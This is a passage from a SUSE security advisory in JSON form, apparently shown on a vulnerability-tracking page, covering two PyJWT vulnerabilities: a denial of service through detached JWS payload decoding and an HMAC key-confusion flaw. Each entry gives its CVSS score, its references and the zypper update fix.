"text": "PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option (\"b64\": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled \u201cwork amplifier\u201d: a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48525",
"url": "https://www.suse.com/security/cve/CVE-2026-48525"
},
{
"category": "external",
"summary": "SUSE Bug 1266801 for CVE-2026-48525",
"url": "https://bugzilla.suse.com/1266801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "important"
}
],
"title": "CVE-2026-48525"
},
{
"cve": "CVE-2026-48526",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48526"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48526",
"url": "https://www.suse.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "SUSE Bug 1266802 for CVE-2026-48526",
"url": "https://bugzilla.suse.com/1266802"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-PyJWT-2.12.1-slfo.1.1_2.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-16T09:09:33Z",
"details": "important"
}
],
"title": "CVE-2026-48526"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…